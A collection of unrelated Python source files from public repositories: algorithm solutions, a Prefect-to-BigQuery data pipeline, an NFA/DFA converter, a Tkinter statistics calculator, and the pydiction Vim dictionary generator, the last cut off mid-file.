si = sys.stdin.readline
R, C = map(int, si().split())
graph = []
for i in range(R):
tmp = list(map(str, si().rstrip()))
graph.append(tmp)
N = int(si())
height_list = list(map(int, si().split()))
# 떠 있다는 것을 어떻게 체크할 것인가??
# BFS()로 [0]에 닿는지 안 닿는지를 체크
def delete_mineral(check_left_right):
# 왼쪽 오른쪽에 따라 삭제
if check_left_right == 1: # 왼쪽인 경우
index = 0
while True:
if index == C:
break
if graph[height][index] == 'x':
graph[height][index] = '.'
return [height, index]
else:
index += 1
else:
index = C-1
while True:
if index == -1:
break
if graph[height][index] == 'x':
graph[height][index] = '.'
return [height, index]
else:
index -= 1
return [-1, -1]
def bfs(x, y):
flag = True
q = deque()
q.append([x, y])
visited[x][y] = 1 # 방문처리
while q:
x, y = q.popleft()
if x == R-1: # 연결된 것이 땅에 닿으면 cluster가 아니므로
flag = False
for i in range(4):
nx, ny = x + dx[i], y + dy[i]
if not (0 <= nx < R and 0 <= ny < C): continue
if visited[nx][ny] == 0 and graph[nx][ny] == 'x':
q.append([nx, ny])
visited[nx][ny] = 1
return flag
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
check_left_right = 1
for height in height_list:
height = R - height # 우리의 좌표 x, y 에 맞추기
# 왼쪽 오른쪽에 따라 mineral 삭제
check_break = delete_mineral(check_left_right)
# 왼쪽 오른쪽 변경
check_left_right = (-1) * check_left_right
# mineral 모양 체크
if check_break != [-1, -1]: #삭제된 것이 존재하는 경우
# 4 방향 체크 candidate
x, y = check_break
for idx in range(4):
nx, ny = x + dx[idx], y + dy[idx]
if not (0 <= nx < R and 0 <= ny < C): continue
if graph[nx][ny] == '.': continue # cluster인지를 체크해야하므로
visited = [[0 for i in range(C)] for i in range(R)]
isCluster = bfs(nx, ny)
if isCluster:
break
# 내리기
if isCluster: # Cluster가 존재하는 경우
down_point = 1000
for i in range(R):
for j in range(C):
if visited[i][j] == 1: #
tmp = 0
cnt = 1
while True:
if visited[i+cnt][j] == 1: # 같은 무리라면
break
if graph[i+cnt][j] == 'x': # 종료
down_point = min(down_point, tmp)
break
if i+cnt == R-1:
down_point = min(down_point, cnt)
break
if visited[i+cnt][j] != 1 and graph[i+cnt][j] == '.': # 같은 무리가 아니고 내려갈 수 있으면
tmp += 1
cnt += 1
for i in range(R-1, -1, -1):
for j in range(C):
if visited[i][j] == 1:
graph[i+down_point][j] = graph[i][j]
graph[i][j] = '.'
for i in graph:
print("".join(i)) | SteadyKim/Algorism | language_PYTHON/백준/BJ2933.py | BJ2933.py | py | 3,822 | python | ko | code | 0 | github-code | 90 |
23297016518 | # -*- coding: UTF-8 -*-
class Solution:
def combine(self, n, k):
self.result = []
self.tmp = []
self.dfs(n, k, 1)
return self.result
def dfs(self, n, k, startIndex):
if len(self.tmp) == k:
self.result.append(self.tmp[:])
return
for i in range(startIndex, n+2-(k-len(self.tmp))):
self.tmp.append(i)
self.dfs(n, k, i+1)
self.tmp.pop()
s = Solution()
print(s.combine(4,2)) | OhOHOh/LeetCodePractice | python/No77.py | No77.py | py | 497 | python | en | code | 0 | github-code | 90 |
13395145348 | import json
import os
from pathlib import Path
from typing import List
import pandas as pd
from prefect import flow, get_run_logger, task
URLS = {
"jan": "https://data.ibb.gov.tr/dataset/3ee6d744-5da2-40c8-9cd6-0e3e41f1928f/resource/db9c7fb3-e7f9-435a-92f4-1b917e357821/download/traffic_density_202001.csv",
"feb": "https://data.ibb.gov.tr/dataset/3ee6d744-5da2-40c8-9cd6-0e3e41f1928f/resource/5fb30ee1-e079-4865-a8cd-16efe2be8352/download/traffic_density_202002.csv",
"mar": "https://data.ibb.gov.tr/dataset/3ee6d744-5da2-40c8-9cd6-0e3e41f1928f/resource/efff9df8-4f40-4a46-8c99-2b3b4c5e2b8c/download/traffic_density_202003.csv",
}
BASE_DIR = "data/traffic"
CREDENTIAL_FILE = "credentials/python-workshop-369005-24786d080402.json"
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = CREDENTIAL_FILE
@task
def prereq():
Path(BASE_DIR).mkdir(parents=True, exist_ok=True)
@task
def download_csv(month: str, url: str, overwrite: bool = False) -> Path:
"""Download the url csv and store it in parquet format"""
logger = get_run_logger()
target_path = Path(BASE_DIR) / f"{month}.parquet"
logger.info(f"Checking for target path {target_path}")
if (not target_path.exists()) or overwrite:
traffic = pd.read_csv(url)
traffic.to_parquet(target_path)
logger.info(f"Download Complete: {month} ({target_path})")
else:
logger.info(f"{month} data is already downloaded in {target_path}")
return target_path
def get_project_id() -> str:
with open(CREDENTIAL_FILE) as fp:
credentials = json.load(fp)
return credentials["project_id"]
@task
def upload_to_bq(path: Path) -> int:
logger = get_run_logger()
logger.info(f"Start uploading {path} to BQ")
traffic = pd.read_parquet(path)
table_name = f"traffic.{path.stem}"
project_id = get_project_id()
traffic.to_gbq(table_name, project_id=project_id, if_exists="replace")
logger.info(
f"{len(traffic)} rows are loaded (maybe overwritten) into {table_name} @ project {project_id}"
)
return len(traffic)
@flow
def traffic_flow():
logger = get_run_logger()
prereq()
paths: List = []
for month, url in URLS.items():
parquet_path = download_csv.submit(month, url)
paths.append(parquet_path)
total_rows = 0
for path in paths:
total_rows += upload_to_bq(path)
logger.info(f"Total number of traffic data loaded into bq: {total_rows}")
if __name__ == "__main__":
traffic_flow()
| husnusensoy/python-workshop | week9/afternoon/traffic.py | traffic.py | py | 2,517 | python | en | code | 2 | github-code | 90 |
26643674954 | import copy
class NFA:
def __init__(self, description):
self.transitions = description['transitions']
self.accept_states = description['accept_states']
self.start = description['start']
def is_accept(self, string):
for symbol in string:
if symbol in self.accept_states:
return True
return False
def get_lambda_moves(self, state):
for label in self.transitions[state].keys():
if label == 'λ':
return set(self.transitions[state]['λ'])
else:
continue
return set()
def transition(self, state, symbol):
if state in self.transitions and symbol in self.transitions[state]:
return set(self.transitions[state][symbol])
else:
return set()
class Helper:
def sorter(self, dfa_description):
for state in dfa_description['transitions'].keys():
dfa_description['transitions'][state]['0'] = ''.join(sorted(dfa_description['transitions'][state]['0']))
if dfa_description['transitions'][state]['0'] == "":
dfa_description['transitions'][state]['0'] = "Dead state"
dfa_description['transitions'][state]['1'] = ''.join(sorted(dfa_description['transitions'][state]['1']))
if dfa_description['transitions'][state]['1'] == "":
dfa_description['transitions'][state]['1'] = "Dead state"
def append_lambda_moves(self, current_transition, current, dfa_description):
lambda_set = set()
for state in current_transition[current]['0']:
lambda_set = lambda_set.union(NFA.get_lambda_moves(self, state))
current_transition[current]['0'] = current_transition[current]['0'].union(lambda_set)
lambda_set.clear()
for state in current_transition[current]['1']:
lambda_set = lambda_set.union(NFA.get_lambda_moves(self, state))
current_transition[current]['1'] = current_transition[current]['1'].union(lambda_set)
dfa_description['transitions'].update(current_transition)
def append_2_to_transition(self, delete_states, update_states):
for state in self.transitions:
old = self.transitions[state]
delete_states[state] = old
new = {f'{state}2': old}
update_states[state] = new
for state in delete_states:
if state in self.transitions:
del self.transitions[state]
for state in update_states:
self.transitions.update(update_states[state])
def append_2_to_inner_transition(self, inner_transitions):
for updated_state in self.transitions:
for label in self.transitions[updated_state]:
if len(self.transitions[updated_state][label]) == 1:
temp = ''.join(self.transitions[updated_state][label])
self.transitions[updated_state][label] = [f'{temp}2']
if len(self.transitions[updated_state][label]) > 1:
for symbol in self.transitions[updated_state][label]:
temp = f'{symbol}2'
inner_transitions.append(temp)
self.transitions[updated_state][label] = inner_transitions
def to_dfa(nfa):
dfa_description = {'transitions': {}, 'accept_states': [], 'start': ''}
# 1) get start state
start_state = nfa.start
if 'λ' in nfa.transitions[start_state].keys():
start_state = start_state + ''.join(nfa.transitions[start_state]['λ'])
dfa_description['start'] = ''.join(sorted(start_state))
# 2) get transitions from start state
no_repeats = []
todo = [start_state]
while len(todo) != 0:
current = ''.join(sorted(todo.pop()))
if current in no_repeats:
continue
no_repeats.append(current)
current_transition = {current: {'0': set(), '1': set()}}
for state in current:
#Get 1 and 0 transitions
current_transition[current]['0'] = current_transition[current]['0'].union(NFA.transition(nfa, state, '0'))
current_transition[current]['1'] = current_transition[current]['1'].union(NFA.transition(nfa, state, '1'))
Helper.append_lambda_moves(nfa, current_transition, current, dfa_description) #get lambda moves
#append to todo
todo.append(''.join(current_transition[current]['0']))
todo.append(''.join(current_transition[current]['1']))
#Figure out which states are accept states
for state in dfa_description['transitions']:
if NFA.is_accept(nfa, state) == True:
dfa_description['accept_states'].append(''.join(sorted(state)))
Helper.sorter(nfa, dfa_description) #Sort key names and value names
return dfa_description
def star_close(nfa):
dfa_description = {'transitions': {}, 'accept_states': [], 'start': 'S'}
dfa_description['accept_states'].append('S')
nfa_copy = copy.deepcopy(nfa)
#Add start state and lambda to original start
dfa_description['transitions']['S'] = {'λ': [nfa_copy.start]}
dfa_description['transitions'].update(nfa_copy.transitions)
for state in nfa_copy.transitions:
if state in nfa_copy.accept_states:
#lambda back to start
dfa_description['transitions'][state]['λ'] = ['S']
return dfa_description
def union(nfa1, nfa2):
dfa_description = {'transitions': {}, 'accept_states': [], 'start': 'S'}
dfa_description['transitions']['S'] = {'λ': [nfa1.start, f'{nfa2.start}2']}
dfa_description['transitions'].update(nfa1.transitions)
dfa_description['accept_states'].append(nfa1.accept_states)
nfa2_copy = copy.deepcopy(nfa2)
#label every state in second nfa with a 2
delete_states = {}
update_states = {}
Helper.append_2_to_transition(nfa2_copy, delete_states, update_states)
inner_transitions = []
#label every state's transition in second nfa with a 2
Helper.append_2_to_inner_transition(nfa2_copy, inner_transitions)
new_accept_states = [i for i in nfa1.accept_states]
#appending a 2 to each accept state
for state in nfa2_copy.accept_states:
new_accept_states.append(f'{state}2')
nfa2_copy.accept_states = new_accept_states
dfa_description['transitions'].update(nfa2_copy.transitions)
dfa_description['accept_states'] = nfa2_copy.accept_states
return dfa_description
def concatenate(nfa1, nfa2):
dfa_description = {'transitions': {}, 'accept_states': [], 'start': ''}
dfa_description['transitions'].update(nfa1.transitions)
dfa_description['start'] = nfa1.start
#label every state in second nfa with a 2
nfa2_copy = copy.deepcopy(nfa2)
delete_states = {}
update_states = {}
Helper.append_2_to_transition(nfa2_copy, delete_states, update_states)
inner_transitions = []
Helper.append_2_to_inner_transition(nfa2_copy, inner_transitions)
dfa_copy = copy.deepcopy(dfa_description)
#appending lambda moves to accept state
for state in dfa_description['transitions']:
if state in nfa1.accept_states and 'λ' in dfa_description['transitions'][state]:
dfa_copy['transitions'][state]['λ'].append(f'{nfa2_copy.start}2')
if state in nfa1.accept_states and 'λ' not in dfa_description['transitions'][state]:
dfa_copy['transitions'][state].update({'λ': [f'{nfa2_copy.start}2']})
dfa_copy['transitions'].update(nfa2_copy.transitions)
#appending a 2 to each accept state
for state in nfa2_copy.accept_states:
dfa_copy['accept_states'].append(f'{state}2')
return dfa_copy
| Dsackler/Theory_Final_Project | Second_Idea/new_nfa.py | new_nfa.py | py | 7,733 | python | en | code | 0 | github-code | 90 |
41799188754 | class Counter:
'счётчик'
def start_from(self, n=0):
'начинает отсчёт от числа n'
self.cnt = n
def increment(self):
self.cnt += 1
def display(self):
print(f'Текущее значение счетчика = {self.cnt}')
def reset(self):
self.cnt = 0
c1 = Counter()
c1.start_from()
c1.increment()
c1.increment()
c1.increment()
c1.display()
c2 = Counter()
c2.start_from(5)
c2.increment()
c2.display()
c1.display()
c2.reset()
c2.display()
c1.display()
c2.increment()
c2.display()
| gotcrab/oop_training | Counter.py | Counter.py | py | 575 | python | ru | code | 0 | github-code | 90 |
16678215032 | from tkinter import*
from PIL import Image,ImageTk
from tkinter import messagebox
class Register:
def __init__(self,root):
self.root=root
self.root.title("Registration")
self.root.geometry("865x486+200+60")
self.root.config(bg="white")
#### BG Image ####
self.bg=ImageTk.PhotoImage(file="images/math.jpg")
bg=Label(self.root,image=self.bg).place(x=0,y=0,relwidth=1,relheight=1)
main_frame=Frame(self.root,bg="white")
main_frame.place(x=60,y=60,width=750,height=400)
title=Label(main_frame,text="Mean Median Mode Calculator",font=("times new roman",25,"bold"),fg="lightgreen",bg="grey").pack() #.place(x=0,y=0,width=750)
nums=Label(main_frame,text="Enter numbers for calculation with comma(,) separated",font=("times new roman",20,"bold"),fg="black",bg="white").place(x=60,y=90)
nums_var=StringVar()
txt_nums=Entry(main_frame,textvariable=nums_var,font=("times new roman",15),bg="lightgrey")
txt_nums.place(x=60,y=140,width=500,height=30)
mean=Label(main_frame,text="Mean :",font=("times new roman",25,"bold"),fg="black",bg="white").place(x=60,y=235)
median=Label(main_frame,text="Median :",font=("times new roman",25,"bold"),fg="black",bg="white").place(x=60,y=280)
mode=Label(main_frame,text="Mode :",font=("times new roman",25,"bold"),fg="black",bg="white").place(x=60,y=325)
txt_mean=Entry(main_frame,font=("times new roman",15),bg="lightgrey")
txt_mean.place(x=300,y=245)
txt_median=Entry(main_frame,font=("times new roman",15),bg="lightgrey")
txt_median.place(x=300,y=290)
txt_mode=Entry(main_frame,font=("times new roman",15),bg="lightgrey")
txt_mode.place(x=300,y=335)
def calculate():
try:
if nums_var.get()=="":
messagebox.showerror("Error","Please enter numbers",parent=root)
else:
ls=nums_var.get()
userlist=ls.split(",")
userlist=[int(i) for i in userlist]
meanvalue=str(Mean(userlist))
medianvalue=str(Median(userlist))
modevalue=str(Mode(userlist))
txt_mean.insert(5,meanvalue)
txt_median.insert(0,medianvalue)
txt_mode.insert(0,modevalue)
except Exception as es:
messagebox.showerror("Error",f"Error due to {str(es)}",parent=root)
def Mean(list_of_num):
total=0
for num in list_of_num:
total+=num
return total/len(list_of_num)
def Mode(list_of_num):
max_count=(0,0)
for num in list_of_num:
occurence=list_of_num.count(num)
if occurence >max_count[0]:
max_count=(occurence,num)
return max_count
def Median(list_of_num):
list_of_num.sort()
if len(list_of_num) %2!=0:
middle_index=int((len(list_of_num)-1)/2)
return list_of_num[middle_index]
elif len(list_of_num)%2==0:
middle_index1=int(len(list_of_num)/2)
middle_index2=int(len(list_of_num)/2)-1
return (list_of_num[middle_index1]+list_of_num[middle_index2])/2
btn_submit=Button(main_frame,text="Calculate",command=calculate,font=("times new roman",14),cursor="hand2",bd=0,bg="lightgreen",fg="White").place(x=60,y=180,width=300,height=35)
btn_mean=Button(main_frame,text="Calculate",command=calculate,font=("times new roman",14),cursor="hand2",bd=0,bg="lightgreen",fg="White").place(x=100,y=180,width=300,height=35)
root=Tk()
obj=Register(root)
root.mainloop()
| hansraj2000/Login-System-With-Registration-and-OTP-Verification | Login system/MeanMod.py | MeanMod.py | py | 3,950 | python | en | code | 0 | github-code | 90 |
37241465421 |
import pytest
import unittest
from mockito import when
from clash_royale_service import ClashRoyaleService
from tests.resources import clash_royale_client_currentriverrace, clash_royale_client_responses
class TestClanRemainingWarPlayers(unittest.TestCase):
def test_clan_players_remaining_war_attacks(self):
service = ClashRoyaleService()
clan_tag = "#9GULPJ9L"
# Mock API responses and certain function calls
when(service.clash_royale_client).get_current_river_race(clan_tag).thenReturn(
clash_royale_client_currentriverrace.CURRENT_RIVER_RACE_API_RESPONSE
)
when(service.clash_royale_client).get_clan_info(clan_tag).thenReturn(
clash_royale_client_responses.CLAN_INFO_API_RESPONSE
)
all_current_war_players_output = service.clan_players_remaining_war_attacks(clan_tag)
# Note 1: there are three players participated in the war, one of them completed all attacks and hence the name is not listed
# Note 2: two players have not completed all the war attacks, hence there are two entries in the list
player_1 = all_current_war_players_output[0]
player_2 = all_current_war_players_output[1]
self.assertEqual(len(all_current_war_players_output),2)
self.assertTrue(player_1.decks_used_today == 3)
self.assertTrue(player_2.decks_used_today == 2) | damoster/royale_clan_card_level_ranker_bot | tests/test_clan_remaining_war_players.py | test_clan_remaining_war_players.py | py | 1,393 | python | en | code | 2 | github-code | 90 |
34630059065 | import haikugen
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/', methods=["GET", "POST"])
def index():
first = second = third = ""
if request.method == "POST":
if request.form.get("generate") == "generate":
first, second, third = haikugen.genhaiku()
return render_template("index.html", first=first, second=second, third=third)
if __name__ == "__main__":
app.run()
| rxxed/ha1kugen | app.py | app.py | py | 443 | python | en | code | 0 | github-code | 90 |
34947643237 | """1) Создайте новую Базу данных. Поля: id, 2 целочисленных поля.
Целочисленные поля заполняются рандомно от 0 до 9.
Посчитайте среднее арифметическое всех элементов без учёта id.
Если среднее арифметическое больше количества записей в БД, то удалите четвёртую запись БД"""
import sqlalchemy as db
import random
meta = db.MetaData()
user = db.Table('User', meta,
db.Column('id', db.Integer, primary_key=True),
db.Column('num_1', db.Integer, nullable=True),
db.Column('num_2', db.Integer, nullable=True))
# print(user.c)
engine = db.create_engine('mysql+mysqlconnector://root:DfbDTuZG1DfbDTuZG1@localhost:3306/hw_23_task_01')
meta.create_all(engine)
connection = engine.connect()
num_1 = random.randint(0, 9)
num_2 = random.randint(0, 9)
add_query = user.insert().values(num_1=num_1, num_2=num_2)
connection.execute(add_query)
connection.commit()
search_ = db.select(user)
result = connection.execute(search_)
final_result = result.fetchall()
total_sum = 0
for i in final_result:
total_sum += sum(i)
arith_mean = total_sum / (len(final_result) * 2)
print(f'Среднее арифметическое равно {arith_mean}, {total_sum}')
print(f'Длина БД: {len(final_result)}')
if arith_mean > len(final_result):
delete_query_for_id = user.delete().where(user.c.id == 4)
result = connection.execute(delete_query_for_id)
# connection.commit()
search_ = db.select(user)
result = connection.execute(search_)
print(result.fetchall())
connection.close()
| Alesya-Laykovich/alesya_laykovich_homeworks | homework_23/task_01.py | task_01.py | py | 1,743 | python | ru | code | 0 | github-code | 90 |
27647112354 | from collections import OrderedDict
# Skdaccess imports
from skdaccess.framework.data_class import DataFetcherBase, ImageWrapper
# 3rd party imports
import h5py
class DataFetcher(DataFetcherBase):
'''
Generic data fetcher for loading images from a hdf file
'''
def __init__(self, dataset_dict, verbose=False):
'''
Initialize DataFetcher
@param dictionary where the keys are filenames and the values are the dataset names
@param verbose: Output extra debug information
'''
self.dataset_dict = dataset_dict
super(DataFetcher, self).__init__([], verbose)
def output(self):
'''
Output data wrapper
@return Image Data Wrapper
'''
data_dict = OrderedDict()
metadata_dict = OrderedDict()
for filename, dataset_list in self.dataset_dict.items():
h5_file = h5py.File(filename, mode='r')
for dataset_name in dataset_list:
data_label = filename + ': ' + dataset_name
data_dict[data_label] = h5_file[dataset_name][:]
metadata_dict[data_label] = OrderedDict()
metadata_dict[data_label]['filename'] = filename
metadata_dict[data_label]['dataaset_name'] = dataset_list
return ImageWrapper(data_dict)
| MITHaystack/scikit-dataaccess | skdaccess/generic/images/hdf.py | hdf.py | py | 1,358 | python | en | code | 44 | github-code | 90 |
1502520766 | import asyncio
import logging
from asyncua import Server, ua
from asyncua.common.methods import uamethod
@uamethod
def func(parent, value):
return value * 2
async def main():
_logger = logging.getLogger("asyncua")
# setup our server
server = Server()
await server.init()
server.set_endpoint("opc.tcp://0.0.0.0:4840/freeopcua/server/")
server.set_server_name("opcua-chat-server")
# setup our own namespace, not really necessary but should as spec
uri = "http://examples.freeopcua.github.io"
idx = await server.register_namespace(uri)
# populating our address space
# server.nodes, contains links to very common nodes like objects and root
myobj = await server.nodes.objects.add_object(idx, "MyChatObjects")
myvar_input = await myobj.add_variable(idx, "MyChatVar_Input", "")
myvar_display = await myobj.add_variable(idx, "MyChatVar_Display", "Starting Chat")
# Set MyVariable to be writable by clients
await myvar_input.set_writable()
await server.nodes.objects.add_method(
ua.NodeId("ServerMethod", idx),
ua.QualifiedName("ServerMethod", idx),
func,
[ua.VariantType.Int64],
[ua.VariantType.Int64],
)
_logger.info("Starting server!")
print("running..")
async with server:
while True:
# short pause to give the server some breathingroom
await asyncio.sleep(0.1)
# if there is something in the input variable, copy to display var and set input to empty string
if await myvar_input.get_value() != '':
new_input = await myvar_input.get_value()
await myvar_display.write_value(new_input)
await myvar_input.write_value('')
print(f"## {new_input}")
if __name__ == "__main__":
#logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.CRITICAL)
asyncio.run(main(), debug=True)
| scrimbley/opcua_concept_chat_server | opcua-server.py | opcua-server.py | py | 1,969 | python | en | code | 0 | github-code | 90 |
26870552315 | import numpy as np
import numpy.testing as npt
from saf.util.observedorder import compute_observed_order_of_accuracy
from ..henrickapproximator import HenrickApproximator
class TestHenrickApproximator:
def test__sine_function__should_give_approximation_of_derivative(self):
x, dx = np.linspace(0, 2*np.pi, num=100, retstep=True)
eps = 1e-40
approx = HenrickApproximator(len(x), dx, eps)
ng = 3
y = np.sin(x)
desired = np.cos(x[ng:])
result = np.empty_like(y)
approx.approximate_flux_derivatives(np.zeros_like(y), y, 0.0, result)
npt.assert_allclose(result[ng:], desired, rtol=1e-6, atol=0)
def test__sine_function__should_give_fourth_order(self):
# This tests checks that HenrickApproximator converges
# to the fourth order of accuracy.
# It should be fifth order, but one point is approximated with the
# fourth order, hence the global convergence of the approximator
# is lower.
r = 2.0
powers = np.arange(2, 7)
n_list = 10.0 * r**powers
error_list = []
for n in n_list:
x, dx = np.linspace(0, 1.2, num=n, retstep=True)
eps = 1e-40
approx = HenrickApproximator(len(x), dx, eps)
y = np.sin(x)
v = np.zeros_like(y)
desired = np.cos(x[3:])
result = np.empty_like(y)
approx.approximate_flux_derivatives(v, y, 0.0, result)
result = result[3:]
error = np.linalg.norm(result - desired, np.inf)
error_list.append(error)
errors = np.asarray(error_list)
observed_orders = compute_observed_order_of_accuracy(errors, n_list)
min_order = 4.0
npt.assert_(all(observed_orders[1:] >= min_order))
| dmitry-kabanov/fickettmodel | saf/nonlinear/tests/test_henrickapproximator.py | test_henrickapproximator.py | py | 1,817 | python | en | code | 0 | github-code | 90 |
70278387498 | import os
from dotenv import load_dotenv
from google.cloud import bigquery
load_dotenv()
project_name = os.environ.get('PROJECT_NAME')
dataset_name = os.environ.get('DATASET_NAME')
bucket_name = os.environ.get('BUCKET_NAME')
table_name = 'source_neko'
client = bigquery.Client()
table_id = f"{project_name}.{dataset_name}.{table_name}"
# job_config = bigquery.LoadJobConfig(
# schema=[
# bigquery.SchemaField("id", "INTEGER"),
# bigquery.SchemaField("name", "STRING"),
# ],
# )
schema = [
bigquery.SchemaField("id", "INTEGER", mode="REQUIRED"),
bigquery.SchemaField("name", "STRING", mode="REQUIRED"),
]
table = bigquery.Table(table_id, schema=schema)
table = client.create_table(table)
data = [
{"id": 1, "name": "John"},
{"id": 4, "name": "Taro"},
{"id": 3, "name": "Reina"},
]
errors = client.insert_rows_json(table_id, data)
if not errors:
print("Data inserted successfully.")
| nuevocs/gcp-bq-python | sample-scripts/create_table_rows.py | create_table_rows.py | py | 938 | python | en | code | 0 | github-code | 90 |
71095892137 | # https://leetcode.com/problems/permutation-in-string
# medium
# daily
from collections import Counter
class Solution:
def checkInclusion(self, s1: str, s2: str) -> bool:
d1, i, window = Counter(s1), 0, 0
while i < len(s2):
if window == len(s1) and all(v == 0 for v in d1.values()):
return True
if s2[i] in d1:
d1[s2[i]] -= 1
window += 1
if window > len(s1):
if s2[i - window + 1] in d1:
d1[s2[i - window + 1]] += 1
window -= 1
i += 1
return window == len(s1) and all(v == 0 for v in d1.values())
| gerus66/leetcode | medium/567_permutation_in_string.py | 567_permutation_in_string.py | py | 671 | python | en | code | 0 | github-code | 90 |
26612266518 | #!/usr/bin/env python
"""
pydiction.py 1.2.3 by Ryan Kulla (rkulla AT gmail DOT com).
License: BSD.
Description: Creates a Vim dictionary of Python module attributes for Vim's
completion feature. The created dictionary file is used by
the Vim ftplugin "python_pydiction.vim".
Usage: pydiction.py <module> [<module> ...] [-v]
Example: The following will append all the "time" and "math" modules'
attributes to a file, in the current directory, called "pydiction",
with and without the "time." and "math." prefix:
$ python pydiction.py time math
To output only to stdout and not append to file, use -v:
$ python pydiction.py -v time math
"""
__author__ = "Ryan Kulla (rkulla AT gmail DOT com)"
__version__ = "1.2.3"
__copyright__ = "Copyright (c) 2003-2014 Ryan Kulla"
import os
import sys
import types
import shutil
# Path/filename of the vim dictionary file to write to:
PYDICTION_DICT = r'complete-dict'
# Path/filename of the vim dictionary backup file:
PYDICTION_DICT_BACKUP = r'complete-dict.last'
# Sentintal to test if we should only output to stdout:
STDOUT_ONLY = False
def get_submodules(module_name, submodules):
"""Build a list of all the submodules of modules."""
# Try to import a given module, so we can dir() it:
try:
imported_module = my_import(module_name)
except ImportError:
return submodules
mod_attrs = dir(imported_module)
for mod_attr in mod_attrs:
try:
if isinstance(getattr(imported_module, mod_attr), types.ModuleType):
submodules.append(module_name + '.' + mod_attr)
except AttributeError as e:
print(e)
return submodules
def get_format(imported_module, mod_attr, use_prefix):
format = ''
if use_prefix:
format_noncallable = '%s.%s'
format_callable = '%s.%s('
else:
format_noncallable = '%s'
format_callable = '%s('
try:
if callable(getattr(imported_module, mod_attr)):
# If an attribute is callable, show an opening parentheses:
format = format_callable
else:
format = format_noncallable
except AttributeError as e:
print(e)
return format
def write_dictionary(module_name, module_list):
"""Write to module attributes to the vim dictionary file."""
python_version = '%s.%s.%s' % get_python_version()
try:
imported_module = my_import(module_name)
except ImportError:
return
mod_attrs = dir(imported_module)
# If a module was passed on the command-line we'll call it a root module
if module_name in module_list:
try:
module_version = '%s/' % imported_module.__version__
except AttributeError:
module_version = ''
module_info = '(%spy%s/%s/root module) ' % (
module_version, python_version, sys.platform)
else:
module_info = ''
write_to.write('--- import %s %s---\n' % (module_name, module_info))
for mod_attr in mod_attrs:
format = get_format(imported_module, mod_attr, True)
if format != '':
write_to.write(format % (module_name, mod_attr) + '\n')
# Generate submodule names by themselves, for when someone does
# "from foo import bar" and wants to complete bar.baz.
# This works the same no matter how many .'s are in the module.
if module_name.count('.'):
# Get the "from" part of the module. E.g., 'xml.parsers'
# if the module name was 'xml.parsers.expat':
first_part = module_name[:module_name.rfind('.')]
# Get the "import" part of the module. E.g., 'expat'
# if the module name was 'xml.parsers.expat'
second_part = module_name[module_name.rfind('.') + 1:]
write_to.write('--- from %s import %s ---\n' %
(first_part, second_part))
for mod_attr in mod_attrs:
format = get_format(imported_module, mod_attr, True)
if format != '':
write_to.write(format % (second_part, mod_attr) + '\n')
# Generate non-fully-qualified module names:
write_to.write('--- from %s import * ---\n' % module_name)
for mod_attr in mod_attrs:
format = get_format(imported_module, mod_attr, False)
if format != '':
write_to.write(format % mod_attr + '\n')
def my_import(name):
"""Make __import__ import "package.module" formatted names."""
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
def remove_duplicates(seq, keep=()):
"""
Remove duplicates from a sequence while preserving order.
The optional tuple argument "keep" can be given to specify
each string you don't want to be removed as a duplicate.
"""
seq2 = []
seen = set()
for i in seq:
if i in (keep):
seq2.append(i)
continue
elif i not in seen:
seq2.append(i)
seen.add(i)
return seq2
def get_yesno(msg="[Y/n]?"):
"""
Returns True if user inputs 'n', 'Y', "yes", "Yes"...
Returns False if user inputs 'n', 'N', "no", "No"...
If they enter an invalid option it tells them so and asks again.
Hitting Enter is equivalent to answering Yes.
Takes an optional message to display, defaults to "[Y/n]?".
"""
while True:
answer = raw_input(msg)
if answer == '':
return True
elif len(answer):
answer = answer.lower()[0]
if answer == 'y':
return True
break
elif answer == 'n':
return False
break
else:
print("Invalid option. Please try again.")
continue
def main(write_to, module_list):
"""Generate a dictionary for Vim of python module attributes."""
submodules = []
for module_name in module_list:
try:
my_import(module_name)
except ImportError as err:
print("Couldn't import: %s. %s" % (module_name, err))
module_list.remove(module_name)
# Step through each command line argument:
for module_name in module_list:
print("Trying module: %s" % module_name)
submodules = get_submodules(module_name, submodules)
# Step through the current module's submodules:
for submodule_name in submodules:
submodules = get_submodules(submodule_name, submodules)
# Add the top-level modules to the list too:
for module_name in module_list:
submodules.append(module_name)
submodules = remove_duplicates(submodules)
submodules.sort()
# Step through all of the modules and submodules to create the dict file:
for submodule_name in submodules:
write_dictionary(submodule_name, module_list)
if STDOUT_ONLY:
return
# Close and Reopen the file for reading and remove all duplicate lines:
write_to.close()
print("Removing duplicates...")
f = open(PYDICTION_DICT, 'r')
file_lines = f.readlines()
file_lines = remove_duplicates(file_lines)
f.close()
# Delete the original file:
os.unlink(PYDICTION_DICT)
# Recreate the file, this time it won't have any duplicates lines:
f = open(PYDICTION_DICT, 'w')
for attr in file_lines:
f.write(attr)
f.close()
print("Done.")
def get_python_version():
"""Returns the major, minor, micro python version as a tuple"""
return sys.version_info[0:3]
def remove_existing_modules(module_list):
"""Removes any existing modules from module list to try"""
f = open(PYDICTION_DICT, 'r')
file_lines = f.readlines()
for module_name in module_list:
for line in file_lines:
if line.find('--- import %s ' % module_name) != -1:
print('"%s" already exists in %s. Skipping...' % \
(module_name, PYDICTION_DICT))
module_list.remove(module_name)
break
f.close()
return module_list
if __name__ == '__main__':
"""Process the command line."""
if get_python_version() < (2, 3):
sys.exit("You need at least Python 2.3")
if len(sys.argv) <= 1:
sys.exit("%s requires at least one argument. None given." %
sys.argv[0])
module_list = sys.argv[1:]
if '-v' in sys.argv:
write_to = sys.stdout
module_list.remove('-v')
STDOUT_ONLY = True
elif os.path.exists(PYDICTION_DICT):
module_list = remove_existing_modules(sys.argv[1:])
if len(module_list) < 1:
# Check if there's still enough command-line arguments:
sys.exit("Nothing new to do. Aborting.")
if os.path.exists(PYDICTION_DICT_BACKUP):
answer = get_yesno('Overwrite existing backup "%s" [Y/n]? ' %
PYDICTION_DICT_BACKUP)
if (answer):
print("Backing up old dictionary to: %s" % \
PYDICTION_DICT_BACKUP)
try:
shutil.copyfile(PYDICTION_DICT, PYDICTION_DICT_BACKUP)
except IOError as err:
print("Couldn't back up %s. %s" % (PYDICTION_DICT, err))
else:
print("Skipping backup...")
print('Appending to: "%s"' % PYDICTION_DICT)
else:
print("Backing up current %s to %s" % \
(PYDICTION_DICT, PYDICTION_DICT_BACKUP))
try:
